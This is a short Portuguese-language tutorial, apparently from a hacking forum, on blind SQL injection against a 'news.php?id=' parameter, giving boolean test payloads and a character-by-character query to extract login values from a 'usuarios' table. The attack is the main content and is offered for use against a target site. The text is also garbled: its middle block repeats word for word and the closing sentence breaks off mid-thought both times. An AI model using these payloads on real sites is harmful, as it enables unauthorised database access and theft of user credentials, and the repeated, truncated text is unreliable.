Voces ja conhecem a tecnica SQL Injection que consiste em pegar informaçoes, inserindo instruçoes SQL em uma query. Em Blind SQL Injection e um pouco diferente pois agora estaremos cegamente.
Para testar se estar vulneravel vamos usar "and 1=0--".
Ficando dessa maneira:
http://www.site.com/news.php?id=500 and 1=0--
Se voce inserir isso e nao carregar corretamente mude o 1=0-- para 1=1--:
http://www.site.com/news.php?id=500 and 1=1--
Se carregar normalmente diferentemente da outra vez e porque esta vulneravel.
Agora vamos explorar entao, para isso e necessario que voce saiba o nomes das colunas e tabelas, para isso voce pode estar ultilizando algum programa ou entao manualmente mesmo.
Estarei supondo que o site tenha a tabela usuarios e a coluna login, vamos entao estar pegando o valor da coluna login.Ficando da seguinte maneira no site:
http://www.site.com/news.php?id=500 and ascii(substring((SELECT concat(login) from usuarios limit 0,1),1,1))=48
Caso carregue normalmente e porque o valor e verdadeiro, no nosso caso, se for 0 o primeiro
Para testar se estar vulneravel vamos usar "and 1=0--".
Ficando dessa maneira:
http://www.site.com/news.php?id=500 and 1=0--
Se voce inserir isso e nao carregar corretamente mude o 1=0-- para 1=1--:
http://www.site.com/news.php?id=500 and 1=1--
Se carregar normalmente diferentemente da outra vez e porque esta vulneravel.
Agora vamos explorar entao, para isso e necessario que voce saiba o nomes das colunas e tabelas, para isso voce pode estar ultilizando algum programa ou entao manualmente mesmo.
Estarei supondo que o site tenha a tabela usuarios e a coluna login, vamos entao estar pegando o valor da coluna login.Ficando da seguinte maneira no site:
http://www.site.com/news.php?id=500 and ascii(substring((SELECT concat(login) from usuarios limit 0,1),1,1))=48
Caso carregue normalmente e porque o valor e verdadeiro, no nosso caso, se for 0 o primeiro
